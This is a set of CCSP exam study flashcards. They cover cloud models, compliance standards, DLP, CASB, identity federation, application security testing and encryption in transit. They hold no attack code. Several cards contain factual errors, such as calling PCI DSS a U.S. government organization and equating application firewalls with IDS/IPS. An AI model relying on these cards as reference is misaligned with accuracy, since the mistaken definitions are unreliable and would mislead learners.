CCSP Study

Lakukan tugas rumah & ujian kamu dengan baik sekarang menggunakan Quizwiz!

REST vs SOAP (either one is API, base on technical standpoint)

*****Representational State Transfer***** >> REST is not a protocol >> Support Cashing, Encryption, Redundancy, and Monitoring. >>Lightweight, ideal for IoT, mobile applications, and serverless computing. >>XML and JSON are the two most popular REST formats. >>REST is a set of architectural restrictions >>REST is URI based (see URL vs URI) ======================== *****Simple Object Access Protocol***** * is not an API, is a protocol! and it can be used in API... The APIs that encapsulate SOAP use it for transferring messages and are often referred to as SOAP APIs, therefore SOAP is sometimes mistaken for an API. * old and slow and does not support cashing. * offer built-in security and transaction compliance that align with many enterprise needs, which make them heavier. * only support XML formatted data SOAP, by itself, is not secure, >>>TLS/SSL<<< must be used during the transfer. because SOAP can use a variety of transports, a common encryption method that does not depend on a transporting protocol was designed. it is known as Web Services Security (WS-Security of WSS) and can encrypt any specified portion of an XML payload. WSS is an extension of SOAP, which is an XLM-based protocol for accessing web services. WSS provides the ability to digitally sign and/or encrypt the XML content. WSS supports various secure token formats, including SAML, Kerberos tickets, and X.509 certificates. WSS is not a method for encrypting XLM messages. On the contrary, XML has its own encryption and signature functionalities, and WSS uses them. API - application programming interface.

PCI DSS requirements

1. Build and maintain a firewall 2. do not use the vendor supplied defaults 3. protect stored cardholder data, never store the CVV/CCV 4. Encrypt transmission over public network 5. Use regularly update anti-virus 6. develop and maintain secure systems and applications 7. Restrict access to the card holder data on a need to know basis 8. use unique user ID for all that have access to the data 9. restrict physical access to cardholder data 10. track and monitor all access to the network resources and cardholder data 11. regularly test security systems and processes 12. maintain a policy that addresses information security for all personel

Cloud Building Blocks

1. CPU 2. RAM 3. Storage 4. Networking Example: Virtual Machines is not a cloud building block because a VM itself consists of CPU, RAM, and Storage and must always be connected to a virtual network P:S: IaaS has the most fundamental building blocks compared to the others two.

FISMA

Federal Information Security Management Act the U.S. Federal Government requires that all U.S. Government agencies conduct risk assessments that align with NIST RMF

Risk Assessment Procedures

1. Identification 2. Analysis 3. Evaluation 4. Treatment Terms: Asset - something of value Threat - Harm that can occur to an asset impacting CIA Vulnerability - a weakness or flaw, it must be exploitable Impact - this is the extent of the damage caused by this threat being exploited. Attack/Exploit- this is the actual exploitation. it takes this from a theoretical topic to real Likelihood - this is the chance that this attack is possible Risk - The knowledge of the combination of Likelihood and impact Control - knowing that specific exploits are possible we do things to reduce the likelihood or the impact. Safeguard - works to reduce the change of the attack occurring. Countermeasure - a type of control we put in place to reduce the impact of the attack

line of defense

1. Infosec Department 2. Risk Management Team 3. Internal Audit

Basic Forensics Rules

1. never do this unless you are trained and, in some places, certified 2. Follow all legal rules such as chain of custody 3. use only approved tools that are acceptable in your court system 4. assume you are going to court and will have to testify 5. document exactly what is done in the collection and examination process.

ISO/IEC

11889 - Trusted Platform Modules 12207 - SDLC 17788 - basic Cloud computing 17789 - Cloud Job Roles 19011 - Audit 15408 - Common Criteria 27001 - ISMS 27002 - issues ISMS 27005 - Information Security Risk Management 27017 - Infrastructure Security 27018 - Protecting PII in the Cloud 27034 - Secure application software development 27036 - supplier relationships 27037 - digital evidence safeguard 27050 - eDiscovery 31000 - RMF (800-37)

FIPS 140-2

A NIST document that lists accredited and outmoded cryptosystems. Level 1 provides the lowest level of security Level 2 requires features that show evidence of tampering Level 3 will zero all plaintext CSP when the removable covers/doors of the cryptographic module are opened. Level 4 protects a cryptographic module against a security compromise due to environmental conditions of fluctuation outside of the module's normal operating ranges for voltage and temperature.

XSS (Cross Site Scripting)

A malicious script hosted on the attacker's site or coded in a link injected onto a trusted site designed to compromise clients browsing the trusted site, circumventing the browser's security model of trusted zones. it allows a hacker to inject a malicious script into an application. when victim navigates to the compromised application, the script runs in their web browser and assumes their browser's permissions.

DNSSEC (Domain Name System Security Extensions)

A suite of specifications used to protect the integrity of DNS records and prevent DNS poisoning attacks. DNSSEC is a secure extension of DNS that is intended to protect the integrity of DNS data and thus prevent spoofing attacks. DNSSEC protects the integrity of DNS data by using digital signatures DNSSEC validation must be enabled on DNS clients. DNSSEC zones must be digitally signed DNSSEC does not require changes to any application for the DNS zone to be protected, the zone and its records must be digitally signed. the public keys that correspond to the private keys used for the signing are known as trust anchors.

Administrative, Technical, and Physical Control

Administrative controls are the measures that target personnel and are intended to enforce or promote certain types of human behaviors. an example of an administrative control i s conducting regular security training of the personnel or through background checks of prospective and current employee. Technical Controls refer any controls other than physical. Physical Control include various physical obstacles that hinder or prevent unwanted behaviors. for example, a company can have checkpoints throughout its premises so that only authorized personnel can get into certain areas. the restrictions can be enforced by requiring employees' access cards. server racks can be locked into cases in order to prevent physical access to them for everyone except a small group of IT administrators.

Agentless

Agentless backups generally interact directly with your hypervisor to snapshot and backup VMs.

ASHRAE

American Society of Heating, Refrigerating and Air-Conditioning Engineers Ideal data center temperature: 64.4 ~ 80.6 F Ideal data center humidity: 40-60

Orchestration vs Automation

Orchestration involves integrating automated tasks between systems and services to create an automated workflow to accomplish things like provisioning, and allocation. Automation targets manual tasks, whereas orchestration targets automated tasks. you cannot orchestrate the tasks that are performed manually, and you cannot automate the tasks that are already performed automatically.

RMF

According to NIST 800-37 Risk Management Framework 1. Prepare 2. Categorize 3. Select 4. Implement 5. Assess 6. Authorizations 7. Continue monitoring According to CCSP All-in-One Exam Guide: before any risks can be managed, they must be identified. this is unique to each company and also depends on the management's decision as to the types and leaves of risks that is chooses to consider. the first step after that is to perform an assessment of the selected risks. depending on the company's level of resources and skills, risk assessments can be qualitative or quantitative. the former is purely verbal and are based on the review of documentation and interviews with the relevant personnel. the latter is more sophisticated and involves calculating numeric metrics, typically in monetary terms.

Apache CloudStack

An open source cloud computing and Infrastructure as a Service (IaaS) platform developed to help Infrastructure as a Service make creating, deploying, and managing cloud services easier by providing a complete "stack" of features and components for cloud environments.

Anonymization

Anonymization is obfuscation technique, involves making the target data anonymously. for example, by removing or hiding all direct and indirect ID information.

API Gateway

Applications communicate with each other mostly by using sets of conventions known as applications programming interfaces (APIs). API is ubiquitous; all cloud services are accessed ultimately through API. if a company has many services or applications that are accessed through APIs, all those API need certain command functionalities, such as authentication, bandwidth throttling, rate limiting, autoscaling, usage monitoring, caching, and TLS termination. Rather than including all those features in each API, it is more efficient to include them in a single front-end point, known as API gateway, that will act as a reverse proxy between clients and the destination APIs. API gateway helps simplify client applications because, instead of learning the different details of accessing a multitude of individual API, programmers can access them in a standardized manner via the API gateway. API gateway enables you to make changes to applications and services without affecting the way clients access those applications and services.

DATA States

At rest In Transit In use

Geotargeting vs Geofencing

Geotargeting is base on the user's IP addresses and is typically used for marketing purposes. Geofencing is base on the user's GPS. It is more accurate than Geotargeting.

GRC

Governance, Risk and Compliance Governance: What corporate strategy leads to the governance structure of the business The governance of a business should be used to create the security governance.

BICSI (Building Industry Consulting Service International)

BICSI has published data center cabling standards. BICSI is a professional organization for IT and telecommunications specialists. it promotes technical education and training and publishes best-practice recommendations and standards pertaining to computing, telecommunications, and data center design.

Brewer-Nash

Chinese Wall Brewer-Nash is an information flow model designed to prevent conflicts of interest in processing business data.

Bidirectional Process

Bidirectional process is meant to create to create a continuous improvement loop

CASB (Shadow IT)

Cloud Access Security Broker There are three types: 1. API- Control 2. Reverse Proxy 3. Forward Proxy API- Control - Offers visibility into data and threats in the cloud, quick deployment, and comprehensive coverage. Reverse Proxy - Ideal for devices generally outside the purview of network security Forward Proxy - Usually works in conjunction with VPN clients or endpoint protection CASB is a third-party entity offering independent identity and access management (IAM) services to CSPs and cloud customers. this can take the form of a variety of services, including SSO, Certificate management, and cryptographic key escrow. CASB does not provide BCDR. anything related to visibility of a cloud, CASB is pretty much an answer ro

Cloud Computing (Continue)

Cloud computing is a model for enabling ubiquitous, convenient, on-demand network access to a shared pool of configurable computing resources (e.g., networks, servers, storage, applications, and services) that can be rapidly provisioned and released with minimal management effort or service provider interaction. This cloud model is composed of five essential characteristics, three service models, and four deployment models. Characteristics (5): 1. on-demand self-service: get what you need without interacting with human 2. Broad Network Access: accessible over the network/internet 3. Resource pooling: multiple consumers shared resources (multi-tenant model). 4. Rapid Elasticity: capabilities can be elastically provisioned and released to scale rapidly when needed. 5. Measured Service: pay for what you need. no more no less. control and optimize resource use by leveraging a metering capability at some level of abstraction appropriate to the type of service. Service Models (3): SaaS: provide applications running on cloud infrastructure, accessible via Web or API. the consumer does not manage or control the underlying cloud infrastructure including network, servers, operating systems, storage, or even individual application capabilities, with the possible exception of limited user-specific application configuration settings. in SaaS, the provider provides a fully functional application and customers connect to it over the internet by using a web browser or a specialized thin client. the application runs on the provider's infrastructure, and the provider is responsible for controlling and managing that infrastructure as well as for configuring the main features of the application. you must purchase licenses for the application and assign them to your users, thereby effectively controlling user access to the application. depending on the specific application, you might be able to configure some branding for your users. typically, the users should be able to configure some minor customizations. aprt from that, you will have virtually no control over the application. you will still be responsible, though, for the data that your users create, store, or process by using the application. PaaS: provide programming languages, libraries, services, and tools supported by the provider. the consumer does not manage or control the underlying cloud infrastructure including network, servers, operating system, or storage, but has control over the deployed applications and possibly configuration settings for the application-hosting environment. PaaS is suitable for software development and testing. However, PaaS is intended for deploying and running various types of software. IaaS: Service Management and CDN belong here. The capability provided to the consumer is to provision processing, storage, networks, and other fundamental computing resources where the consumer is able to deploy and run arbitrary software, which can include operating systems and applications. The consumer does not manage or control the underlying cloud infrastructure but has control over operating systems, storage, and deployed applications; and possibly limited control of select networking components (e.g., host firewalls). Deployment Models (4) 1. Private Cloud The cloud infrastructure is provisioned for exclusive use by a single organization comprising multiple consumers (e.g., business units). It may be owned, managed, and operated by the organization, a third party, or some combination of them, and it may exist on or off premises. 2. Community Cloud The cloud infrastructure is provisioned for exclusive use by a specific community of consumers from organizations that have shared concerns (e.g., mission, security requirements, policy, and compliance considerations). It may be owned, managed, and operated by one or more of the organizations in the community, a third party, or some combination of them, and it may exist on or off premises. 3. Public Cloud The cloud infrastructure is provisioned for open use by the general public. It may be owned, managed, and operated by a business, academic, government organization, or some combination of them. It exists on the premises of the cloud provider 4. Hybrid Cloud The cloud infrastructure is a composition of two or more distinct cloud infrastructures (private, community, or public) that remain unique entities, but are bound together by standardized or proprietary technology that enables data and application portability (e.g., cloud bursting for load balancing between clouds).

Where would you install a DLP application to monitor data-in-use? A. On an application server B. At the network perimeter C. On a database server D. On a user's mobile device

Host-based DLP sits on an endpoint and monitors all data-in-use on the device. Servers require monitoring data at rest. Network-based DLP can be used to monitor traffic at the network perimeter.

Hyper-jacking and Breakout Attack

Hyper-jacking is an attack that compromises a hypervisors and allows the attacker to use it maliciously. Breakout Attack is when others tenant able to manipulates the hypervisor to gain access to another tenant's data.

IRM VS DLP

IRM allow you to remotely manage users and the level of permissions they have to access and manipulate information. DLP can be used to prevent data leakage, but cannot prevent modification.

Common Criterial EAL (Evaluation Assurance Level)

ISO/ICE 15408 EAL1 Functionally tested EAL2 Structurally tested EAL3 Methodically tested and checked EAL4 Methodically designed, tested, and reviewed EAL5 Semi-formally designed and tested EAL6 Semi-formally verified design and tested EAL7 Formally verified design and tested

CASB vs Inter-Cloud service Provider

CASB (CSN) provides Identity and access management services to CSP and cloud customers. this can take the form of various services, including SSO, certificate management, and cryptographic key escrow. Inter-Cloud Service Provider (CSP) provide Federated Identity Management (FIM), a technology that facilitates access to resources across organizational boundaries.

DLP

Core stages: 1. Classification 2. Monitoring 3. Enforcement DLP can decrypt encrypted traffic DLP is a collection of techniques and technologies intended to prevent or minimize the chance of data losses caused by human errors and malicious actions. DLP is supposed to monitor the use of the specified data and prevent the specified types of actions on that data. In Transit where the data is being transmitted over a network, if the destination is within your company's network, DLP usually doesn't need to be involved. leaks usually occur when the destination is outside your network. therefore, part of a DLP solution is usually to monitor outbound, or egress, network traffic. such traffic is very likely to be encrypted. to be able to monitor such traffic, the DLP solution must be able to decrypt it. otherwise, it would not be able to detect the presence of the data whose use it is supposed to monitor in the egress traffic. re-encryption may not necessarily be done by the same DLP component that decrypted the traffic. it might not be required at all, because DLP might be processing a forked copy of the outbound steam. It all depends on the specific implementation. DLP is supposed to monitor the use of sensitive data and take action in accordance with your company's relevant policies. the actions can include notifications, alerts, and blocking certain types of activities. for al this to work, a DLP solution must know which data is to be targeted. to that end, all the data in your company's possession needs to be discovered and then classified, or categorized. DLP is supposed to be configured to target the data with specific classifications, such as sensitive, confidential, or critical. thus data discovery and data classification constitute the first stage of a DLP solution. once you have identified the target data, you can implement monitoring the use of that data. thus monitoring occurs in the second stage. when a DLP solution, in the course of its monitoring, detects and violation of the specified policies, the solution enforces the policy and takes the action or actions in accordance with the relevant policy. in summary: 1. Data Discovery 2. Data classified or categorized 3. Monitoring 4. Enforcing installing a component of a DLP solution on client computers is typically done in order to protect data in use. for protecting data at rest, you would usually need to deploy a DLP solution to the computers that either host the target data or at least control access to it. for data in transit, you would usually need to implement a DLP solution at the perimeter of your company's network, on a firewall, a proxy server, or another similar host. Shared is a data lifecycle phase when data is sent out of its original environment to an outside consumer. once the data is outside your system, the only way that data can be protected is if a protection mechanism is incorporated into the data. DLP solutions are supposed to prevent primarily "honest mistakes" such as accidental deletions or inadvertent disclosure via electronic means. implementing a DLP solution can help you company comply with regulations and also demonstrate its due diligence. DLP is unlikely to be able to prevent a user from taking a screenshot and then passing the image on to an intended recipient. thus DLP is not specifically intended to prevent malicious disclosure.

Data Center Redundancies

External: Power Feeds/Line Power substations Fuel tanks for the generator Network Circuits*** Cooling/Chilling infrastructure Building access Points Fence, walls, spotlights, and other security controls at the physical perimeter Internal: PDU Power feeds to racks Cooling and Chillings units Networking Devices Storage Devices Physical access point (to the equipment)***

SDN

DSoftware Defined Network typically found within the physical network (not virtual) at a cloud or service provider. Break down into: 1. Infrastructure layer 2. Control Layer 3. Data Layer SDN (AKA SD-WAN), is a method of managing switches within a network. it alleviates the switches work of making forwarding decision and places that burden on a controller node. This effectively divides a switch work into two roles. The control Plane and the Data Plane The control Plane allows the switch to request a decision to be made by the controller Software-defined network security involves virtualizing security functions from the traditional hardware they tend to operate on. They enforce virtual network functions, with data and monitoring accessible through one intuitive interface. Software Defined Networking provides CSPs with holistic centralized management across their entire network by abstracting network >>control<< from network forwarding capabilities (like routing). This creates two networking layers (control and infrastructure) rather than a single layer and allows providers to optimize network management.

DRM (Data Rights Management) vs. IRM

Data Rights Management is a broader field of Information Rights Management that deals with the protection of copyrighted materials like music, movies, and other publications. IRM is specifically focused on the protection of corporate data. both DRM and IRM refer to the same technology that provides protection from files, webpages, and other types of electronic data. Because both DRM and IRM use the same technology, either one can prevent both copying and forwarding. the protection provided by DRM is incorporated into each document and therefore persists wherever the documents go. moreover, in contrast to the protection provided through traditional access permissions, DRM can prevent a protected document from being moved or copied from its original location, printed, or sent or forwarded by using email or other means of electronic data transfer.

PII (Direct Identifiers vs Indirect Identifiers)

Direct Identifiers - are things that are completely unique to you (like a passport number). Indirect Identifiers - things that are by their own, they cannot identify you as an individual.

Raw Storage

Enables storage logical unit number (LUN) to be directly connected to a VM from SAN. VMware server

ENISA

European Network and Information Security Agency ENISA Information Assurance Framework - European cloud specific risk assessment

IRM

Information Right Management IRM tools provide a continuous audit trail of access to data under its control. as such, organizations can use IRM tools to audit all data access to ensure it aligns with legal and regulatory requirements.

Metastrure

Infrastructure is the underlying physical structure, such as switches, servers, routers, ect. Meta means "above", the word Metastructure mean structure (virtual) sitting on top on Infrastructure (physical). Metastruture is a virtual structure a physical infrastructure. Everything from the hypervisor to virtual machines are found here. Metastructure enables and supports infrastructure management and configuration and is typically the line of demark between the cloud provider and cloud customer

Inter VM Attack

Inter-VM attacks are launched from one VM to another co-residing VM through shared memory, network connections, and other shared resources without compromising the hypervisor layer

iSCSI

Internet Small Computer System Interface iSCSI enables the use of SCSI over TCP/IP networks. This enables block-level data storage over LANs, WANs, or the Internet. iSCSI support virtualized, network-based storage in cloud environments. for iSCSI, bidirectional CHAP is the best

OWASP (Open Web Application Security Project)

Is an online community dedicated to web application security. This community works to create freely-available articles, methodologies, documentation, tools, and technologies that include web application flaws and a way to address and correct them. They provide a Logging Cheat Sheet that provides useful guidelines for logging event sources. They published Web Security Testing Guild (WSTG)

LUN

Logical unit number, used to identify a logical unit, often used to refer to a logical disk (Volume storage) LUN is a unique identifier that is assigned to each chunk of physical storage infrastructure (for example, each volume) that is virtually assigned to a virtual machine.

Data Masking

Masking involves replacing sensitive data with some placeholder. Static Masking: refers to a substitution that does not change. creating an alternate data set, in which all confidential data is replace with similarly formatted mock data, and using it for testing. Dynamic Masking: refers to a substitution performed dynamically as the data travels from the back-end database to the application tier.

Cloud Computing

NIST 800-145 It is a model for enabling ubiquitous, convenient, on-demand network access to a shared proof of configurable computing resources that can be rapidly provisioned and released with minimal management effort of service provider interaction. -NIST

NIST

National Institute of Standards and Technology 800-37 - Security and Privacy (RMF) 800-53 - U.S. Government security controls. 800-145 - Definition of Cloud Computing

GDPR (General Data Protection Regulation)

New European Union law on data protection and privacy for individuals. 1. Lawfulness/Fairness/Transparency 2. Purpose Limitation 3. Data Minimization 4. Accuracy 5. Storage Limitation 6. Integrity and confidentiality 7. Accountability **GDPR does not care about Availability ***Data Custodian is a primary consideration for GDPR and others privacy regulations. GDPR was established in 2016 and went into effect in 2018 Directive 95/46 EC was passed by the European Union in 1995, it was superseded by the GDPR in 2018

OAuth, OpenID, and WS-Federation

OAuth - Open Authentication this is about >>authorization<<, not authentication. Uses JSON (whereas SAML uses XML) Uses API calls, better for mobile and IoT Self encoded token JSON Web Signature (JWS) JSON Web Token (JWT) ============================ OpenID: allows you to use an existing account to sign in to multiple websites, without needing to create new passwords (see openid.net) OpenID Connect (OIDC) is an identity layer built on top of the OAuth 2.0 Framework. =============================== Oasis standard for authentication that results in a "security token" championed by Microsoft Uses SOAP and XML WS-Federation is part of the larger WS-security framework and an extension of the functionality for WS-Trust. The features of WS-Federation can be used directly by SOAP applications and web services. WS-Fed is a protocol that can be used to negotiate the insurance of a token.

SAML (Security Assertion Markup Language)

Older but well supported within industry today Authentication that is XML based that results in a "token" Service provider is the destination web service that the user want to communicate with Service provider relies on the Identity provider to authenticate the user, so they are the "relying" party Identity provider verifies user identity through identification and authentication The token is passed through the user's computer therefore the client's is the "relaying" party

Threat Modeling (Done at the design phase)

PASTA (Process for Attack Simulation and Threat Analysis) Step 1: Define the objectives Step 2: Define the technical Scope Step 3: Decompose the application Step 4: Analyze the Threats Step 5: Vulnerability Analysis Step 6: Attack Analysis Step 7: Risk and Impact Analysis ================================ STRIDE: S-Spoofing T-Tampering R-Repudiation I-Information disclosure D-Denial of service E-Elevation of Privilege =================================== DREAD D- Damage potential R-Reproducibility E-Exploitability A-Affected users D-Discoverability =================================== Architecture, Threat, Attack Surface, and Mitigation (ATASM) ====================================== Threat modeling is a systemic, structured approach to identifying and mitigating possible threats to an IT environment, system, service, or application. when using threat modeling, it is imply that you are going to analyze your targets, such as a specific system or application, and determine how it will behave if a specific threat materialises. despite the fact that all threat models are different, their main focus is the same, to make the process of identifying and mitigating threats orderly and structured, and more efficient.

PCI DSS (Payment Card Industry Data Security Standard)

PCI DSS is a U.S. government organization that provides guidelines pertaining to various technologies, including computing in general and cloud computing in particular. PCI is a contract, not a law

Vendor Lock-in

Portability is the ease with which a cloud workload can move from one cloud provider to another. Vendor lock-in is, in essence, the lack of portability. It occurs when a cloud provider uses proprietary or closed technologies that make it difficult for customers to migrate their data to another cloud.

Forensic Evidence collecting in Cloud

Primary Concern: 1. Data Ownership 2. Multitenancy 3. Jurisdiction **Collecting forensic evidence in the cloud does not typically cause an operation impact.

Recovery

RPO: how much data loss is acceptable to an organization RTO: the duration of time without service that is acceptable to an organization RSL: the percentage of total functionality that is needed during business continuity.

Application Firewall V.S regular Firewall

Regular Firewall can target these network traffic: * Port * IP address * Protocols * Layers: 2, 3, 4 Application Firewall can target these network traffic: *Port * IP address * Protocols * behaviors * contents Applications Firewall also known as IDS, IPS, Next-generation firewall, web proxies.

Reservation

Reservations are the mechanisms by which CSPs are able to ensure/guarantee a certain amount of resources availability to a particular customer.

SSO technologies

SAML is about Authentication OAuth is about authorization OpenID is about Identification WS-Federation

SAST vs DAST (Static/Dynamic Application Security Testing)

SAST scans the application code at rest (without execution) to discover faulty code posing a security threat. SAST is a white box testing SAST testing involves renewing sources code and all the available documentation on a target application. the testing is performed statically in the sense that the application is not run. ============================================= DAST tests the running application and has no access to its source code. DAST is a black box testing. DAST testing involves using the application, performed without any prior knowledge of an applications' internals. the testers do not have access to the source code, user manual, or any other documentation and get to know the application by trying to use it. DAST testing should be performed by professional testers, developers, and security experts. the flaws that may be discovered primarily depend on the skill and experience of the testers rather than on the type of testing. when an application is ready or its development has been completed, either type of testing is possible. while the application is still developing, static testing becomes possible as soon as parts of the source code have been written but dynamic testing cannot begin until at least some individual components have been completed. ============================== IAST (Interactive AppSec Testing) designed for both web and mobile applications to detect and report issues even while the application is running. IAST was developed to stop all the limitations that exist in both SAST and DAST. it uses the Grey Box Testing Methodology. ============================== RASP (Runtime Application Self-Protection) RASP is a runtime application that is integrated into an application to analyze inward and outward traffic and end-user behavioral pattern to prevent security attacks. RASP is used after product release which makes it a more security-focused tool when compared to the others that are known for testing. RASP is deployed to a web or application server which makes it to sit next to the main application while it's running to monitor and analyze both the inward and outward traffic behavior. Development (Find vulnerabilities) SAST + DAST = IAST Operation (Block attacks) WAF + IDS/IPS = RASP

SOC 1, 2, & 3 (Service Organization Controls)

SOC 1 - primarily focused on an organization's management of financial records SOC 2 - organization's security details SOC 3 - organization's security, for public - does not have type 1 or 2 Type 1: reports evaluate a point in time Type 2: require a minimum of six months. SOC framework replaces SAS 70 in 2011. SOC aligns with the standards in SSAE 18, which is governed by the American Institute of Certified Public Accountants (AICPA). US: SAS70 > SSAE 16 (2011) > SSAE18 (2017) International: ISAE 3400/3402 Trust Service Engaagement: 1. Security 2. Availability 3. Process intrigety 4. Confidenciality 5. Privacy

SSO vs. Identity Federation

SSO applies to authentications within an organization. SSO is a subset of identity federation. Identity Federation applies across multiple organizations there are several implementations of Federate Identity Management (FIM): 1. OAuth 2. OpenID Connect 3. Seb Service Federation 4. SAML SAML is probably the most commonly used federation protocol. its uses an XML-based data format and can use SOAP for messaging.

SaaS, PaaS, IaaS

SaaS offer very limited access to logs. IaaS and PaaS offer the greatest access to systems, logs, and information for your development team to use.

Penetration Testing

SaaS provider don't allow clients to do penetration testing Professional hacking to access data and computing power without being granted access; professional pen-testers are hired to identify and repair vulnerabilities and only work once, given written permission to obtain ungranted access. Penetration testing can be either white or black testing depending on how much information is provided to the testers.

SOX

Sarbanes-Oxley Act Regulation that helps protect investors from fraudulent financial reporting by corporations. Sox is a U.S. Federal Law that defines the rules pertaining to the financial accountability, of U.S based public companies. Sox is intended to provide protection for investors against deceitful accounting, which became possible because of poor oversight on the part of certain companies' boards of directors. Sox defines rules pertaining to financial transactions and is enforced by the Securities and Exchange Commission. The main issue that affects the IT side of the business is the data retention requirements specified in SOX.

ISO/IEC 27034

Secure Software Development ONF to ANF has a one-to-many relationship ONF is used to create multiple ANF

DevSecOps

Security has become significantly more important nowadays. therefore, all security issues should be considered from the very beginning of the development process, as opposed to being added at the end of the development cycle. this new approach in relation to DevOps is often referred to as DevSecOps. A combination of software development, security operations, and systems operations by integrating each discipline with the others

Shares (in Cloud) vs. Reservation (in Cloud)

Shares are used to allocate resources among all tenants whenever the number of resource requests exceeds the number of available resources. Reservations are used to guarantee a customer a minimum amount of resources, while limits are used to set a maximum resource allocation for a tenant.

BCDR (Business Continuity and Disaster Recovery)

Should be tested annually at minimum BCDR planning process should be cyclical, with no beginning and no end. however, initially, the process should began with defining the plan's scope. then gather requirements and then analyze them. then the revelant risks should be assessed. only after that should the actual designing of the plan take place and its subsequent implementation. once the plan has been implemented, it should be tested, a report should be produced with the results of the testing, and then, as the last phase of the cycle, the plan may need to be revised in order to address any discovered deficiencies. this begins a new iteration, back to defining a scope. Defining the scope Gathering requirements Analyze assess implementation test revise the plan.

SIEM (Security Information and Event Management)

Software that can be configured to evaluate data logs from IDS, IPS, firewalls, and proxy servers in order to detect significant events that require the attention of IT staff according to predefined rules. Common capabilities are as follows: 1. Aggregation 2. Alerting 3. Correlation

Bit Splitting

Splitting up and storing encrypted information across different cloud storage services Methods: Secret Sharing Made Short (SSMS): 1. Encrypt the information 2. Use Information Disperse Algorithm (IDA) 3. Using the encryption key using Secret Sharing Algorithm All or nothing transformation with Reed Solomon (AONT-RS) 1. Integrates AONT and erasure coding (pararity) a. Encrypts and transform information and encryption key into blocks. b. uses IDA to split blocks in 'm' shares, which is distributed

Static Vs Dynamic Masking

Static masking is the best type of masking to use in a development environment that requires data similar to production data. Dynamic masking is best for use in production environments.

Storage Type

Structured: >>is well-suited for databases >>Data will be stored in volumes and blocks. >>the file or the data is split into equal-sized pieces (blocks). >>a block can be located but does not have associated metadata with it. --------------------------------- Unstructured: >>>a set of files. <<< >>>object storage<<< >>storage of a piece of data at a time. each object could be a file, video, picture, etc. >>object storage is not a hierarchical storage like file storage (see volume storage). >> each object is stored with metadata and a unique identifier that allow it to be located. ------------------------------------- Object: >> Object storage are often used for storing VM image. allows you to pay for exactly what you use. it is used for storing files but as generic objects, without an underlying file system, and without a hierarchy of folders. the objects are usually organized into groups and, within each group, format a flat namespace. each object is assigned a unique key, which is used for accessing the object. the objects can usually be accessed programmatically by using the appropriate application programming interfaces (API) or web-based calls, such as HTTP GET requests. Objects storage is a serverless storage service. customers are completely shielded from the underlying physical infrastructure and for the most part from the logical infrastructure as well. for example, you can create a storage account of the type that supports object storage, you can create containers for the objects, and you can populate those containers and manage their contents, but you cannot specify any servers, physical or virtual, that would host the objects in your storage account. Volume: must be attached to a virtual machine with an OS. it is block-level storage requires that you pay for a block, or volume, of storage, even though you may not use the entire volume. the volume appears as a regular local hard disk. you can partition it into volumes, format them by using a file system and populate them with files organized into a hierarchy of folders ======================== PaaS models use: 1. structured - (Block) 2. unstructured - (Blob) IaaS models use: 1. Object - (unstructured) 2. Volume - (structured) SaaS models use: 1. information storage and management 2. content and file storage 3. SaaS storage is usually obfuscated by the users.

Risk Assessment Methods

There are two types Quantitative - to assess the monetary impact of specific threat events use formulars to calculate the monetary impact SLE = asset value(AV) * Exposure Factor (EF) Annual Rate of Occurrence (ARO) ALE = SLE* ARO Qualitative- to assess the level of priority a threat should be assigned what is the damage to your reputation.

TPM (ISO 11889)

Trusted Platform Module is a secure microcontroller that validate a system's integrity by physically and logically protecting credentials.

Shibboleth Standard

User authenticates with their organization's credentials and the organization (Identity Provider) passes information to service providers.

Encryption of Data in Transit

VPN uses SSH, TSL, or IPsec to encrypt and transmitt the data ---------------------- SSH: Secure Shell , Layer 5 Computer to computer Perfect for administrative connection to routers, switches, servers, etc. ============================== TLS: Protovide confidentiality and ingrity. Commonly used to secure HTTP traffic. TLS use asymmetric (handshake) to exchange secrete key, and symmetric (record) to exchange the data. In any communication between two computers, one acts as a client and the other one acts as a server. >>A client always initiates<< communication, and a server always responds to the client's initial request. TLS includes two protocols: 1. Handshake 2. Record During the handshake phase, a client and a server negotiate the technical specifics, such as a TLS version and an encryption algorithm, and generate a session key. a handshake begins when a client sends a message to the server that contains a random string of data and information about the TLS versions and encryption algorithms that the client supports. the server indicates the version of TLS and the encryption algorithm that the server has chosen. the message also includes the server's certificate, the associated public key, and another random string of data. the client verifies the server's certificate, thereby confirming the server's identity. then the client generates another random string of data, known as a premaster secret, and encrypts it with the server's public key. the server decrypts the premaster secret with its private key. finally, both the client and another server independently generate a session key from the client's random string, the server's random string, and the premaster secret. because they both use the same algorithm, they arrive at the same result, the symmetric encryption session key. During the recording phase, the client and the server exchange data, which is the ultimate goal of their interaction. TLS uses X.509.3 certificate for authentication. the certificates are sometimes also referred to as PKI certificates because they are intended for so-called public key cryptography. in a client/server session, only the server must have a TLS certificate. the client's certificate is optional. the exact steps in a TLS interaction can somewhat vary, depending on the TLS version and cipher suite that the client and server will use. ================================== IPSec: >A Layer 3 protocol that defines the encryption, authentication, and key management for TCP/IP transmissions. >IPSec is an enhancement to IPv4 and is native to IPv6. >IPSec is unique among authentication methods in that it adds security information to the header of all IP packets. IPsec can use two security protocols: 1. Authentication Header (AH): AH provide intergitry 2. Encapsulating Security Payload (ESP): ESP confidentiality. Tunnel Mode: (hide everything) Both AH and Data get encrypted by ESP Tunnel Mode usually creates between site-to-site VPN across the Internet. Transport Mode: (Hide data, shown AH) only encrypted payload portion.

WAF (Web Application Firewall)

WAF is a firewall that filters, monitors, and blocks HTTP traffic to and from a web application; this differs from a regular firewall in that the WAF is able to filter the content of specific web applications. WAF operates at Layer 7. it accepts only HTTP traffic, inspects it, and blocks any discovered attacks. A WAF understands HTTP and can detect common attack types, such as cross-site scripting (XSS), cross-site requests forgery (CSRF), and SQL injection. WAF should be positioned between a perimeter firewall and the web servers(s) that the WAF is supposed to protect. all HTTP traffic intended for those servers should be directed to the WAF, which will forward legitimate inbound HTTP traffic to the web servers and filter out what it determines to be malicious traffic.

Zero Trust Architecture (ZTA)

Zero Trust Architecture relies on the principle of "trust no one."

Containers

